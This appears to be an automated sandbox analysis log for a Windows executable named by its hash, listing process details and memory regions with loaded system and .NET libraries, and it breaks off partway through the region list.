# Flog Txt Version 1
# Analyzer Version: 4.6.0
# Analyzer Build Date: Jul 8 2022 06:26:21
# Log Creation Date: 05.08.2022 10:57:25.342
Process:
id = "1"
image_name = "42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe"
filename = "c:\\users\\rdhj0cnfevzx\\desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe"
page_root = "0x57eb6000"
os_pid = "0x1390"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "analysis_target"
parent_id = "0"
os_parent_pid = "0x7b4"
cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe\" "
cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 117
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 118
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 119
start_va = 0x40000
end_va = 0x54fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 120
start_va = 0x60000
end_va = 0x9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 121
start_va = 0xa0000
end_va = 0x19ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 122
start_va = 0x1a0000
end_va = 0x1a3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 123
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 124
start_va = 0x1c0000
end_va = 0x1c1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 125
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 126
start_va = 0x400000
end_va = 0x4affff
monitored = 1
entry_point = 0x477a92
region_type = mapped_file
name = "42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe")
Region:
id = 127
start_va = 0x771d0000
end_va = 0x7734afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 128
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 129
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 130
start_va = 0x7fff0000
end_va = 0x7ffa1676ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 131
start_va = 0x7ffa16770000
end_va = 0x7ffa16930fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 132
start_va = 0x7ffa16931000
end_va = 0x7ffffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00007ffa16931000"
filename = ""
Region:
id = 271
start_va = 0x4b0000
end_va = 0x62ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004b0000"
filename = ""
Region:
id = 272
start_va = 0x640d0000
end_va = 0x6411ffff
monitored = 0
entry_point = 0x640e8180
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 273
start_va = 0x64050000
end_va = 0x640c9fff
monitored = 0
entry_point = 0x64063290
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 274
start_va = 0x76720000
end_va = 0x767fffff
monitored = 0
entry_point = 0x76733980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 275
start_va = 0x64120000
end_va = 0x64127fff
monitored = 0
entry_point = 0x641217c0
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 276
start_va = 0x630000
end_va = 0x8fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000630000"
filename = ""
Region:
id = 277
start_va = 0x6f9e0000
end_va = 0x6fa38fff
monitored = 1
entry_point = 0x6f9f0780
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 278
start_va = 0x76720000
end_va = 0x767fffff
monitored = 0
entry_point = 0x76733980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 279
start_va = 0x76910000
end_va = 0x76a8dfff
monitored = 0
entry_point = 0x769c1b90
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 280
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 281
start_va = 0x7feb0000
end_va = 0x7ffaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007feb0000"
filename = ""
Region:
id = 282
start_va = 0x4b0000
end_va = 0x56dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 283
start_va = 0x620000
end_va = 0x62ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000620000"
filename = ""
Region:
id = 284
start_va = 0x630000
end_va = 0x73ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000630000"
filename = ""
Region:
id = 285
start_va = 0x800000
end_va = 0x8fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 286
start_va = 0x73e50000
end_va = 0x73ee1fff
monitored = 0
entry_point = 0x73e90380
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")
Region:
id = 287
start_va = 0x7fb00000
end_va = 0x7fea0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sysmain.sdb"
filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb")
Region:
id = 288
start_va = 0x20000
end_va = 0x23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 289
start_va = 0x76600000
end_va = 0x7667afff
monitored = 0
entry_point = 0x7661e970
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 290
start_va = 0x76a90000
end_va = 0x76b4dfff
monitored = 0
entry_point = 0x76ac5630
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 291
start_va = 0x570000
end_va = 0x5affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 292
start_va = 0x630000
end_va = 0x72ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000630000"
filename = ""
Region:
id = 293
start_va = 0x730000
end_va = 0x73ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000730000"
filename = ""
Region:
id = 294
start_va = 0x76cb0000
end_va = 0x76cf3fff
monitored = 0
entry_point = 0x76cc9d80
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 295
start_va = 0x76c00000
end_va = 0x76cacfff
monitored = 0
entry_point = 0x76c14f00
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 296
start_va = 0x73f00000
end_va = 0x73f1dfff
monitored = 0
entry_point = 0x73f0b640
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 297
start_va = 0x73ef0000
end_va = 0x73ef9fff
monitored = 0
entry_point = 0x73ef2a00
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 298
start_va = 0x76840000
end_va = 0x76897fff
monitored = 0
entry_point = 0x768825c0
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 299
start_va = 0x5b0000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005b0000"
filename = ""
Region:
id = 300
start_va = 0x6f900000
end_va = 0x6f97cfff
monitored = 1
entry_point = 0x6f910db0
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 301
start_va = 0x76d00000
end_va = 0x76d44fff
monitored = 0
entry_point = 0x76d1de90
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 302
start_va = 0x762b0000
end_va = 0x7646cfff
monitored = 0
entry_point = 0x76392a10
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")
Region:
id = 303
start_va = 0x74ab0000
end_va = 0x74bfefff
monitored = 0
entry_point = 0x74b66820
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 304
start_va = 0x743d0000
end_va = 0x74516fff
monitored = 0
entry_point = 0x743e1cf0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 305
start_va = 0x1d0000
end_va = 0x1f9fff
monitored = 0
entry_point = 0x1d5680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 306
start_va = 0x900000
end_va = 0xa87fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000900000"
filename = ""
Region:
id = 307
start_va = 0x741b0000
end_va = 0x741dafff
monitored = 0
entry_point = 0x741b5680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 308
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 309
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 310
start_va = 0xa90000
end_va = 0xc10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a90000"
filename = ""
Region:
id = 311
start_va = 0xc20000
end_va = 0x201ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c20000"
filename = ""
Region:
id = 312
start_va = 0x740000
end_va = 0x7ebfff
monitored = 1
entry_point = 0x7b7a92
region_type = mapped_file
name = "42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe")
Region:
id = 313
start_va = 0x76d50000
end_va = 0x76d5bfff
monitored = 0
entry_point = 0x76d53930
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")
Region:
id = 314
start_va = 0x6f8f0000
end_va = 0x6f8f7fff
monitored = 0
entry_point = 0x6f8f17b0
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 315
start_va = 0x6f200000
end_va = 0x6f8e0fff
monitored = 1
entry_point = 0x6f22cd70
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 316
start_va = 0x6f100000
end_va = 0x6f1f4fff
monitored = 0
entry_point = 0x6f154160
region_type = mapped_file
name = "msvcr120_clr0400.dll"
filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")
Region:
id = 317
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 318
start_va = 0x1f0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 319
start_va = 0x5b0000
end_va = 0x5bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005b0000"
filename = ""
Region:
id = 320
start_va = 0x5f0000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005f0000"
filename = ""
Region:
id = 321
start_va = 0x5c0000
end_va = 0x5cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005c0000"
filename = ""
Region:
id = 322
start_va = 0x5d0000
end_va = 0x5dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 323
start_va = 0x5e0000
end_va = 0x5effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005e0000"
filename = ""
Region:
id = 324
start_va = 0x600000
end_va = 0x60ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 325
start_va = 0x610000
end_va = 0x610fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 326
start_va = 0x740000
end_va = 0x740fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 327
start_va = 0x2020000
end_va = 0x220ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002020000"
filename = ""
Region:
id = 328
start_va = 0x2020000
end_va = 0x21effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002020000"
filename = ""
Region:
id = 329
start_va = 0x2200000
end_va = 0x220ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 330
start_va = 0x750000
end_va = 0x78ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000750000"
filename = ""
Region:
id = 331
start_va = 0x2020000
end_va = 0x211ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002020000"
filename = ""
Region:
id = 332
start_va = 0x21e0000
end_va = 0x21effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021e0000"
filename = ""
Region:
id = 333
start_va = 0x790000
end_va = 0x79ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000790000"
filename = ""
Region:
id = 334
start_va = 0x2210000
end_va = 0x420ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002210000"
filename = ""
Region:
id = 335
start_va = 0x2120000
end_va = 0x21bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 336
start_va = 0x790000
end_va = 0x7cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000790000"
filename = ""
Region:
id = 337
start_va = 0x4210000
end_va = 0x430ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004210000"
filename = ""
Region:
id = 338
start_va = 0x4310000
end_va = 0x4646fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 339
start_va = 0x6de40000
end_va = 0x6f0f1fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")
Region:
id = 340
start_va = 0x74dc0000
end_va = 0x74eaafff
monitored = 0
entry_point = 0x74dfd650
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 341
start_va = 0x4650000
end_va = 0x46e0fff
monitored = 0
entry_point = 0x4688cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 342
start_va = 0x72cb0000
end_va = 0x72d24fff
monitored = 0
entry_point = 0x72ce9a60
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 343
start_va = 0x4650000
end_va = 0x482ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004650000"
filename = ""
Region:
id = 344
start_va = 0x6d470000
end_va = 0x6de3bfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")
Region:
id = 345
start_va = 0x6d2e0000
end_va = 0x6d46efff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.drawing.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll")
Region:
id = 346
start_va = 0x6c670000
end_va = 0x6d2d6fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.windows.forms.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll")
Region:
id = 347
start_va = 0x7d0000
end_va = 0x7dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007d0000"
filename = ""
Region:
id = 348
start_va = 0x6c5f0000
end_va = 0x6c66ffff
monitored = 1
entry_point = 0x6c5f1180
region_type = mapped_file
name = "clrjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")
Region:
id = 349
start_va = 0x76680000
end_va = 0x76711fff
monitored = 0
entry_point = 0x766b8cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 350
start_va = 0x7e0000
end_va = 0x7effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 351
start_va = 0x5e430000
end_va = 0x5e4cbfff
monitored = 1
entry_point = 0x5e4be9a6
region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\microsoft.visualbasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 352
start_va = 0x7f0000
end_va = 0x7fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007f0000"
filename = ""
Region:
id = 353
start_va = 0x4650000
end_va = 0x46ebfff
monitored = 1
entry_point = 0x46de9a6
region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\microsoft.visualbasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 354
start_va = 0x4820000
end_va = 0x482ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004820000"
filename = ""
Region:
id = 355
start_va = 0x21c0000
end_va = 0x21cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021c0000"
filename = ""
Region:
id = 356
start_va = 0x7fe60000
end_va = 0x7feaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fe60000"
filename = ""
Region:
id = 357
start_va = 0x7fe50000
end_va = 0x7fe5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fe50000"
filename = ""
Region:
id = 358
start_va = 0x46f0000
end_va = 0x477efff
monitored = 0
entry_point = 0x46fdd60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 359
start_va = 0x6c550000
end_va = 0x6c5e1fff
monitored = 0
entry_point = 0x6c55dd60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 360
start_va = 0x4830000
end_va = 0x49effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004830000"
filename = ""
Region:
id = 361
start_va = 0x21c0000
end_va = 0x21c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000021c0000"
filename = ""
Region:
id = 362
start_va = 0x46f0000
end_va = 0x47abfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000046f0000"
filename = ""
Region:
id = 363
start_va = 0x21c0000
end_va = 0x21c3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000021c0000"
filename = ""
Region:
id = 364
start_va = 0x21d0000
end_va = 0x21d3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021d0000"
filename = ""
Region:
id = 365
start_va = 0x49f0000
end_va = 0x4bcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049f0000"
filename = ""
Region:
id = 366
start_va = 0x713a0000
end_va = 0x713bcfff
monitored = 0
entry_point = 0x713a3b10
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 367
start_va = 0x21f0000
end_va = 0x21fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 368
start_va = 0x47b0000
end_va = 0x47bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000047b0000"
filename = ""
Region:
id = 369
start_va = 0x47c0000
end_va = 0x47cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000047c0000"
filename = ""
Region:
id = 370
start_va = 0x47d0000
end_va = 0x47dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000047d0000"
filename = ""
Region:
id = 371
start_va = 0x47e0000
end_va = 0x47effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000047e0000"
filename = ""
Region:
id = 372
start_va = 0x47f0000
end_va = 0x47fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000047f0000"
filename = ""
Region:
id = 373
start_va = 0x6c3e0000
end_va = 0x6c54afff
monitored = 0
entry_point = 0x6c44e360
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll")
Region:
id = 374
start_va = 0x4830000
end_va = 0x492ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004830000"
filename = ""
Region:
id = 375
start_va = 0x49e0000
end_va = 0x49effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049e0000"
filename = ""
Region:
id = 376
start_va = 0x47b0000
end_va = 0x47effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000047b0000"
filename = ""
Region:
id = 377
start_va = 0x49f0000
end_va = 0x4aeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049f0000"
filename = ""
Region:
id = 378
start_va = 0x4bc0000
end_va = 0x4bcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bc0000"
filename = ""
Region:
id = 379
start_va = 0x70b70000
end_va = 0x70d60fff
monitored = 0
entry_point = 0x70c53cd0
region_type = mapped_file
name = "dwrite.dll"
filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll")
Region:
id = 380
start_va = 0x764e0000
end_va = 0x765fefff
monitored = 0
entry_point = 0x76525980
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 381
start_va = 0x4830000
end_va = 0x4878fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-system.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat")
Region:
id = 382
start_va = 0x4920000
end_va = 0x492ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004920000"
filename = ""
Region:
id = 383
start_va = 0x21f0000
